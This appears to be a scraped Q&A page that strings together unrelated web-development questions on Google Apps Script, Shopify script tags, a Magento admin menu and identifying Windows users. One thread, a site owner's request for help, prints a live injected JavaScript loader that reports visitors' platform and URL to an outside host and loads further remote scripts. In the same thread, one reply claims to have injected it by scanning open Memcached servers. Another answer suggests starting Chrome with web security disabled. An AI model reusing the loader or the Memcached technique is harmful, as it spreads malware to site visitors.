GAS UrlFetchApp can't request GAS projects - javascript

I am trying to have a large set of Google Apps Scripts projects, and want to have a set of HTML files available to all projects. I have a core project which has the following code:
function doGet (e) {
return HtmlService.createHtmlOutputFromFile(e.parameter.htmldoc);
}
Then, from another project I can just run
UrlFetchApp.fetch("https://script.google.com/macros/s/someid/dev?htmldoc=footertemplate").getContextText();
However, when I try to run the code to load an HTML file, what happens is it gets HTML code to login to Google:
Everyone is able to run both projects, and every prompt asking me for permission I gave permission to. If anyone is able to figure it out, I would greatly appreciate it.
EDIT:
I have tried this out with two other fresh projects and found that this isn't just with these two projects

There must be an issue with your publish settings. While publish, you should get an option like "Who has access to the app"
If you want to access without login, then set it as "Anyone, even anonymous".

Related

Malicious JS code in Wordpress change the domain where it is hosted

In my Wordpress site, i have this malicious code before "/body":
<script src="https://fastjscdn.org/static.js?hash=a633f506a53746a846742c5655ebf596"></script>
The file static.js contains this:
window.__google__ads__show||(window.__google__ads__show="1",function(){if(function t(){try{return window.self!==window.top}catch(a){return!0}}()){var t,a,e=window.parent.document.createElement("script");e.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(e);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{}),t="https://fastjscdn.org/"+window.location.hostname.replace("www.","")+"/static.js",(a=document.createElement("script")).src=t,document.head.appendChild(a)}());
Before "fastjscdn .org", the maliciuos JS code was hosting on domanin name "asmr9999 .live". Since few days, the domain has changed in "fastjscdn .org".
How is it possible? How can it change the domain where is it hosted?
I am sure that Wordpress, themes and plugins do not contain the malicious code. I didn't find anything in the database, also in base64 encode, for now.
Also, What does the code in the JS file do to my site?
I also found other people with my same malware, in a custom CMS, we can not solve the problem in any way. More info here
It maybe late,but let me tell the truth.The problem is the Memcached server you are using which is public and no password in network.I made a script scanning the network and injecting this malicious code to every memcached server.It's a "cache-side" xss attack.Your server is safe.Configure your firewall and block connection from outside to port 11211,everything will ok.
You can use an online JavaScript beautifier tool to check the content of static.js: seems to be injecting script adapted to the platform, probably the same that you mentioned in your other question that will trigger the download of a malware/adware
The reason why it could change the domain in the script is probably because your host is still infected; the domain was registered very recently, and was probably chosen as it looks less suspicious than the previous one

Starting a vbs script from a HTML file

I've been wrapping my head around this problem for a couple of days searching for all possible solutions on the forums and online but can't seem to get it working.
I'm calling a script by a link on a "button" to start a script on a server (in HTML):
<a href="#" onClick="RunScript();">
The script code is:
<script type="text/javascript" language="javascript">
function RunScript() {
var objShell = new ActiveXObject("WScript.Shell");
objShell.Run("%comspec% /k my_projects_EN.vbs" "), 1, false;
}
</script>
So why am I using a vbs? What I'm trying to do is create custom pages for each employee. So the vbs is actually checking the computer name and an if clause directs the employee to a custom page. With my basic knowledge of programming and a lot of hours of searching I did not find a better solution for this yet. So I'm trying to make this one to work.
And it does but only if I'm running the script locally (desktop). But as the webpage will be used in an intranet location this script will be on a server. And this is where it became a bit hairy as I can't seem to find the right combination of commands to do so. I already tried pushd for creating a mounted volume or currentDir for setting up the location of script but nothing seems to work completely.
I assume that I'm missing a subroutine for the function as adding anything there just stops the script - but how to go at it is beyond me.
All help is appreciated even if it means I have to bury myself into another program language (not preferred of course).
I am certain that there is a way to solve this other than sending a script to each employee to put on their desktop (each time a new employee comes to work).
Thanks
Edit: I see an additional clarification is in order:
We're creating an intranet webpage as a help for more efficient work for our employees. We're on the same level as the rest so not IT or admin rights guys so we're on our own.
The point is to have a personal page for each employee which can be accessed via the same interface. So a link has to send each person to another page that is why I've created the vbs code which helps with that. Checking several other options this seemed to be the simplest and best one - and it works at least partially. I don't see any security risks as all will be done on each client computer - the files themselves will be located on the server. The script itself does not represent any risk at least not that I would see it - but of course I'm not a specialist.
So in short this is what we're trying to do:
Main page -> link to My_projects button -> start script (located on the same server as the main page) -> determine the client computer name -> redirect to the right webpage.
Sorry for a lack of details, I see that it's sometimes hard to explain exactly what you want if you're not a pro in these things.
Thanks again.
If those computers are physically located at your workplace and you have control over the system, it would be better to tweak DNS redirections on those computers. Otherwise, more general and OS independent solution, would be session, cookie, or token on employee's computer. Still, some kind of authentication other than having one piece of machine, could be more versatile and secure (unless your PCs are 1000 feet underground :-) ).
Edit: What kind of info/data are sent to the server script? Server script runs on server and everything related to "this computer" (e.g. name) is actually referring to the server itself. Thus the script needs some data from the client to recognise his computer.
thanks for the effort
Everything is actually located on the server so the client computer only runs the page or interface which is in \Server\folder\folder for example.
In your browser you open the start page which contains a button with a link to this script (located on the same server).
When the script executes it searches for the computer name and send the user to his personal page:
Set wshShell = CreateObject( "WScript.Shell" )
strComputerName = wshShell.ExpandEnvironmentStrings( "%COMPUTERNAME%" )
On Error Resume Next
'#01 name_surname
If strComputerName = "XXXXXXXX" Then
CreateObject("WScript.Shell").Run """name_surname.html"""
and so on.
And this is all there is. As mentioned before we don't have admin rights to change anything on the client computer. So nothing is being done on the client side other that executing a script located on the server.

Uniquely recognize Client on localhost

I have apache installed on a windows laptop that is not connected to the internet. The laptop has multiple user accounts. Let's say that two of the user accounts are "Adam" and "Sally". I have a project on localhost that needs to differentiate between the different Window's users via the Chrome browser.
I understand detecting the username through the browser directly is a gross security sandbox breach, but I don't care: I have complete control of the computer and the project is not web accessible, so there are no security concerns. I'm willing to cheat in any way imaginable including building a custom .exe to help. I just need to differentiate between the different accounts. It doesn't need to be by username, but any alternative ID would need to persist for that given user.
I am asking for outside of the box thinking.
How can I create a page that I can open in Chrome that will say "Hi Adam" or "Hi Sally" or even "Hi -=[GUID]=-" without the visitor ever typing in their name/guid.
You should probably use something like NW.js or Electron instead of chrome for this so you don't have to sacrifice security.
Here's a picture of me running the nw.js sdk and loading just the demo page, bringing up the dev tools and retrieving my username.
Pretty straight forward. Follow node documentation and do whatever you'd like there.
You could have a batch file that runs on startup via the task scheduler or registry in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run or Local Group Policy that performs something like echo setCurrentUser("%USERNAME%"); > c:\your_project_directory\set-current-user.js, then you just have a script that defines <script>function setCurrentUser(s) { alert("Hello "+s); /* ... */ }</script> followed by a script import like <script src="set-current-user.js"></script>
If you just want to be able to do whatever in the filesystem, change the shortcut that launches Chrome to --allow-file-access-from-files --user-data-dir=c:\your_project_directory --disable-web-security and restart the PC (or just kill all chrome.exe processes, incl. background).
Edit: Updated with note on using --allow-file-access-from-files from Pritam Banerjee. If you go that route, he gets credit. :)
If you're interested in trying NW.js, here's a full example:
package.json :
{
"name": "nw-hello-user",
"version": "0.0.1",
"main": "index.html"
}
index.html :
<!DOCTYPE html>
<html>
<head>
<title>Hello!</title>
</head>
<body>
Hello <script>document.write(process.env.USERNAME)</script>!
</body>
</html>
Here's the command line:
Here's the end product!
Since you tagged your question with PHP, you could just create a index.php file with the following contents:
Hi <?= getenv("USERNAME") ?>
getenv("USERNAME") returns the the value of the USERNAME environment variable.
Update: Thanks to TylerY86 for providing the more correct way to get the username. Also note from his comment below:
You also have to be sure that the Apache instance is running in the
context of the user, and not as a service. If you try the example, if
you get something like SYSTEM or IUSR_MACHINE instead of the user
name, you'll need to adjust.
You have 2 choices, as far as I see.
1) you may ask users to identify themself first time they use the page and store it to the local storage. Since those are different users on the machine, their localStorages should be separate.
2) You may deploy a small web service on the local host, that gets the user credentials from the system and returns on GET request.

Shopify App - Using Script Tags with Ruby on Rails Application

I'm trying to familiarize myself with the concept of using script tags. I'm making a ruby on rails app that does something as simple as alert "Hi" when a customer visits a page. I am testing this public app on a local server and I have the shopify_app gem installed. The app has been authenticated and I have access to the store's data. I've viewed the Shopify API documentation on using script tags and I've looked at the Shopify Embedded App example that Shopify has on GitHub. The documentation details the properties of a script tag and gives examples of script tags with their properties defined, but doesn't say anything about where to place the script tag in an application, or how to configure an environment so that the js file in the script tag will go through.
I've discovered that a js file being added with a script tag will only work if the js file is hosted online, so I've uploaded the js file to google drive. I have the code for the script tag in the index action of my HomeController (the default page for the app). This is the code I'm using:
def index
if response = request.env['omniauth.auth']
sess = ShopifyAPI::Session.new(params[:shop], response[:credentials][:token])
session[:shopify] = sess
ShopifyAPI::Base.activate_session(sess)
ShopifyAPI::ScriptTag.create(
:event => "onload",
:src => "https://drive.google.com/..."
)
end
I think the problem may be tied to the request.env. The response is not being read as request.env[omniauth.auth] and I believe that the response coming back as valid may be required for the script tag to go through.
The method that I tried above is from the 2nd answer given in this topic: How to develop rails app for shopify with ScriptTags.
The first answer suggested using this code:
ShopifyAPI::Base.site = token
s = ShopifyAPI::ScriptTag.create(:events => "onload",:src => "your javascript url")
However, it doesn't say where to place both lines of code in a rails application. I tried putting the second line in a js file in my rails application, but it did not work.
I don't know if I'm encountering problems because I'm running the app on a local server or if there is something missing from the configuration of my application.
I'd appreciate it if anyone could point me in the right direction.
Try putting something like this in config/initializers/shopify_app.rb
ShopifyApp.configure do |config|
config.api_key = "xxx-xxxx-xxx-xxx"
config.secret = "xxx-xxxx-xxx-xxx"
config.scope = "read_orders, read_products"
config.embedded_app = true
config.scripttags = [
{event:'onload', src: 'https://yourdomain.herokuapp.com/javascripts/yourjs.js'}
]
end
Yes, you are correct that you'll need the js file you want to include for your script tag publicly available - if you are using localhost for development look into ngrok.
Do yourself the favor of ensuring your callbacks use SSL when interacting with the Shopify API (i.e. configure your app with https://localhost/ as a callback setting in the Shopify app settings). I went through the trouble of configuring thin as the web server locally with a self-signed SSL certificate.
With a proper set up you should be able to debug why the response is failing the omniauth check.
I'm new to the Shopify API(s), but not Rails. Their documentation leaves a lot to be desired.
Good luck to you sir,

Magento install copied - admin menu doesn't work

I cloned an existing magento 1.7.2 installation on the same server with a test subdomain. The frontend seems to work, and I can login to the admin. The admin menu doesn't work however, no dropdowns, and copying url paths doesn't work either. I've searched online, and most answers date back to 2008 and suggest that it's a rights issue. So I've changed the rights of folders and files to 755 and 644, but still no working menus. The cache (var/cache) is empty.
These menus are javascript generated. The following error message is from the console:
Error: TypeError: Element.addClassName is not a function
To be clear - the solution is not in javascript, but it's something on the server. This install works on the same server in another directory with another domain.
Any ideas how to fix this?
The error
Error: TypeError: Element.addClassName is not a function
indicates some javascript on your page can't call the addClassName method.
The addClassName method is added to element via the prototype javascript framework.
That means its very likely your browser can't download the prototype.js file. Since it can't download this file, the addClassName method is never defined, and you get the error you're seeing.
Look at the source code of your admin pages and find the script tag that includes the version of prototpye shipped with your version of Magento.
<script type="text/javascript" src="http://magento.example.com/js/prototype/prototype.js"></script>
Take the URL from this script tag and load it in your browser.
My guess is you'll get a 404 because the file is missing, or a forbidden error because the file has incorrect permissions, or some other web server error that prevents the file from being shown. It's also possible that the link is pointing to an older domain name that's based on a value configured or cached in Magento.
Track down the source of that problem, and you'll be good to go.
Another reason could be that the skin and CSS rules are not correct for your environment.
I've just moved a site from live to local, and the skin/css/media were configured to a subdomain so I looked in the core_config_data table and updated the URLs
Please check if you have set merge js or css to yes, you can update this via db if you cant do it via menu:
SELECT * FROM core_config_data WHERE path LIKE 'dev%'
Change from 1 to 0 merge_css and merge_js
In my case I have changed the permissions of folder and its recurring files and folder and it started working. Try it once.

Categories